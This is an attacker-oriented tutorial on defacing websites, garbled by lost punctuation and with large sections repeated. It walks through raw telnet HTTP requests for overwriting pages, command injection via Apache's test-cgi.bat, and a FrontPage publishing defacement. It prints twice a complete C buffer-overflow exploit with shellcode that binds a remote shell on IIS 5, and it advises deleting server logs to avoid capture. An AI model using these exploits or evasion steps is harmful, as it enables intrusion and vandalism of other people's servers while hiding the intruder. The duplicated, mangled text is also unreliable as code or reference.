(server) or any web server dynamically When you are able to read
a document from a given directory then it signals that the
directory is readable Normally it has been seen that directories
containing databases files are forbidden with read access for
security reasons
WRITE ACCESS
I will explain HTTP protocol concisely before going to Write
Access Well HTTP is a component of TCPIP stack It was
configured and formulated with the connotation of sharing files
across the Internet HTTP is the acronym of Hyper Text Transfer
Protocol The name itself indicates the description Files can be
uploaded to the server and downloaded from the server through
the HTTP protocol
NOTE Files can be uploaded to the server and downloaded from
the server through the HTTP protocol without the need of any type
of authentication
Well this was technique was employed and executed years ago
Soon computer enthusiaists realized that this kind of technique
was a huge security threat So they developed new techniques to
subdue the security threat Nowadays web servers are designed
and configured as such to give write access to only selected virtual
directories
TIP Try telnetting a web server and find out some good
information about the server and its behavior
Now I am going to explain some commonly used commands
supported by a web server
GET It is used to send requests for read access to a file residing
on the server by the browser (client)
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
GET indexhtml HTTP11rnrn
Sidetrack The HTML (Hyper text markup language) source code of
indexhtml page occupying on the server will be regressed or if
requested for ASP or PHP or any server side executable page then
the dynamically generated HTML page will be shown
DEL This is a command for deleting files on the web server This
command requires write access on the assigned virtual directory
where the file is to be deleted
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
del indexhtml HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
PUT It is used to create files on the server it necessitates write
access on the particular virtual directory where the file is to be
created
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PUT cctxt HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
ECHO The publishing tool it is the same command used in DOS
(Disk Operating System) Batch Files The output can be redirected
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn
TIP SB is the acronym of my name Shubham Bhattacharya
When you are defacing a site you can also use acronyms of your
name
PROPFIND Propfind is used as a request for directory surfing
NOTE In IIS server it is used as an administrative tool for web
server analysis
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PROPFIND HTTP11
Hostiis-server
Content-Length0
Sidetrack You will definitely get a 403 Forbidden Error as it is
quiet evident that the wwwroot will never have a write access
Well you must be wondering how you can test write access
permission for a particular directory in IIS server
To test the write access permission for a particular directory in IIS
server follow the steps given below
- To test if write access permission is enabled for anonymous web
clients then telnet the web server or the website in port 80 and
make the following request
PUT scriptshtwasp HTTP11
Host iis-server
Content-Length 10 ltentergtltentergt
Once you make the following request the server should respond
with a 100 Continue Message
HTTP11 100 Continue
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105300 GMT
On receiving the above type 10 letters
XXXXXXXXXX
HTTP11 201 Created
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105608 GMT
Location httpiis-serverdirmy_filetxt
Content-Length 0
Allow OPTIONS TRACE GET HEAD DELETE PUT COPY
MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK
If the server responds with this 201 Created response then the
write permission is enabled
EXECUTION ACCESS
Server side pages like ASP PHP JSP or DLL are used in highly
advanced database driven dynamic websites which dynamically
generates the HTML and sends it to the client (web browser)
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept
NOTE DLL EXE etc need execution perquisites they are kept in a
single virtual directory
DIRECTORY SURFING
It has been often seen that web servers to be more specific
virtual directories of web servers are configured as such to
provide directory surfing access to all clients or special clients
through proper authentications Actually directory browsing
means that you can list the file and folders present in your virtual
directory just as you see in your standalone system Well most of
the web server administrators turn off this feature But exploit
codes can be used to get directory listing of the virtual directory
EXPLOIT FOR DIRECTORY LISTING IN APACHE
Well if you are not familiar with apache then let me give you a
brief description Apache is a server in which you have to
configure your web server using command and scripts These
scripts and commands are kept in httpdconf file in capache
groupapacheconf folder default Apache installation on a
distinctive windows system This file contains all the settings of
the web server and if we get our hands into this file then we get
to know all the settings of the web server including the location of
log files directory permissions write access authentication levels
etc
So now letrsquos get on with the exploit As we know that Apache is
the most preferred web server This web server has a bat in its
cgi-bin directory This bat file is named as test-cgibat Actually
the motive of the bat file is to test the privileges of cgi-bin
directory
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 3
NOTE Port 80 is the default HTTP port for web servers
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
GET HTTP11rnrn
Hostserver-software
ltentergt
ltentergt
ltentergt
HTTP11 403 Forbidden
Date Fri 17 Mar 2006 130020 GMT
Server Apache1322 (Win32)
Connection close
Content-Type texthtml charset=iso-8859-1
ltDOCTYPE HTML PUBLIC -IETFDTD HTML 20ENgt
ltHTMLgtltHEADgt
ltTITLEgt403 Forbidd
enltTITLEgt
ltHEADgtltBODYgt
ltH1gtForbiddenltH1gt
You dont have permission to access
on
this serverltPgt
ltHRgt
ltADDRESSgtApache1322 Server at wwwapacheorg
Port 80ltADD
RESSgt
ltBODYgtltHTMLgt
Connection to host lost
I have telnetted wwwhackingtheworldilitehostcom into port 80
so I get the above figure in my command prompt
Okay I hope you have figured out what I mean It is mere telnet
response Okay I will tell you what to do you have to telnet a web
server or website into port 80
NOTE I have telnetted the domain name you can telnet the IP
address also
So after telnetting the web server name or the website you will
get a blank screen So in the blank screen type in some requests
like GET HTTP11rnrn then type something like
Hostserver-software then press ltentergt quite a few times until
you get the serverrsquos response The server will respond with its
software information
Examining the Web Server
If you are using Microsoft IIS (Internet Information service) then
you must have noticed that the default installation contains the
website root in CInetpubwwwroot Basically all the directories
of server softwares are called as virtual directories Actually in a
web server each virtual directory is provided with different type
of permissions Permissions like Read Write Execution of Scripts
and Execution of Executable like Dll and server side pages like
ASP CGI etc
Now I am going to describe the methods of analyzing the
directory permission of a virtual directory residing in a web server
READ ACCESS
Whenever you visit a website through your web browser you type
in the domain name Do you know what happens when you type in
the domain name Actually when you type in the domain name
and press enter you are connected to port 80 (HTTP port) of the
IP address linked with the domain name
For Example
You type in wwwhackingtheworldilitehostcom in your web
browserrsquos address bar The IP (Internet Protocol) address of this
site is 7229654 so as soon as you press enter the URL
(Uniform Resource Locator) is redirects the IP address to
7229654indexhtml indexphp indexasp indexjsp or
whatever the index page is configured in the web server Now
once you press enter you will be redirected to Hacking the
Worldrsquos official website In the website you will be able to read
contents from its wwwroot If the wwwroot directory contains
ASP PHP or JSP then those server side pages are executed and
HTML is generated and passed to the browser (client) by IIS
(server) or any web server dynamically When you are able to read
a document from a given directory then it signals that the
directory is readable Normally it has been seen that directories
containing databases files are forbidden with read access for
security reasons
WRITE ACCESS
I will explain HTTP protocol concisely before going to Write
Access Well HTTP is a component of TCPIP stack It was
configured and formulated with the connotation of sharing files
across the Internet HTTP is the acronym of Hyper Text Transfer
Protocol The name itself indicates the description Files can be
uploaded to the server and downloaded from the server through
the HTTP protocol
NOTE Files can be uploaded to the server and downloaded from
the server through the HTTP protocol without the need of any type
of authentication
Well this was technique was employed and executed years ago
Soon computer enthusiaists realized that this kind of technique
was a huge security threat So they developed new techniques to
subdue the security threat Nowadays web servers are designed
and configured as such to give write access to only selected virtual
directories
TIP Try telnetting a web server and find out some good
information about the server and its behavior
Now I am going to explain some commonly used commands
supported by a web server
GET It is used to send requests for read access to a file residing
on the server by the browser (client)
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
GET indexhtml HTTP11rnrn
Sidetrack The HTML (Hyper text markup language) source code of
indexhtml page occupying on the server will be regressed or if
requested for ASP or PHP or any server side executable page then
the dynamically generated HTML page will be shown
DEL This is a command for deleting files on the web server This
command requires write access on the assigned virtual directory
where the file is to be deleted
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
del indexhtml HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
PUT It is used to create files on the server it necessitates write
access on the particular virtual directory where the file is to be
created
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PUT cctxt HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
ECHO The publishing tool it is the same command used in DOS
(Disk Operating System) Batch Files The output can be redirected
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn
TIP SB is the acronym of my name Shubham Bhattacharya
When you are defacing a site you can also use acronyms of your
name
PROPFIND Propfind is used as a request for directory surfing
NOTE In IIS server it is used as an administrative tool for web
server analysis
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PROPFIND HTTP11
Hostiis-server
Content-Length0
Sidetrack You will definitely get a 403 Forbidden Error as it is
quiet evident that the wwwroot will never have a write access
Well you must be wondering how you can test write access
permission for a particular directory in IIS server
To test the write access permission for a particular directory in IIS
server follow the steps given below
- To test if write access permission is enabled for anonymous web
clients then telnet the web server or the website in port 80 and
make the following request
PUT scriptshtwasp HTTP11
Host iis-server
Content-Length 10 ltentergtltentergt
Once you make the following request the server should respond
with a 100 Continue Message
HTTP11 100 Continue
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105300 GMT
On receiving the above type 10 letters
XXXXXXXXXX
HTTP11 201 Created
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105608 GMT
Location httpiis-serverdirmy_filetxt
Content-Length 0
Allow OPTIONS TRACE GET HEAD DELETE PUT COPY
MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK
If the server responds with this 201 Created response then the
write permission is enabled
EXECUTION ACCESS
Server side pages like ASP PHP JSP or DLL are used in highly
advanced database driven dynamic websites which dynamically
generates the HTML and sends it to the client (web browser)
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept
NOTE DLL EXE etc need execution perquisites they are kept in a
single virtual directory
DIRECTORY SURFING
It has been often seen that web servers to be more specific
virtual directories of web servers are configured as such to
provide directory surfing access to all clients or special clients
through proper authentications Actually directory browsing
means that you can list the file and folders present in your virtual
directory just as you see in your standalone system Well most of
the web server administrators turn off this feature But exploit
codes can be used to get directory listing of the virtual directory
EXPLOIT FOR DIRECTORY LISTING IN APACHE
Well if you are not familiar with apache then let me give you a
brief description Apache is a server in which you have to
configure your web server using command and scripts These
scripts and commands are kept in httpdconf file in capache
groupapacheconf folder default Apache installation on a
distinctive windows system This file contains all the settings of
the web server and if we get our hands into this file then we get
to know all the settings of the web server including the location of
log files directory permissions write access authentication levels
etc
So now letrsquos get on with the exploit As we know that Apache is
the most preferred web server This web server has a bat in its
cgi-bin directory This bat file is named as test-cgibat Actually
the motive of the bat file is to test the privileges of cgi-bin
directory
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
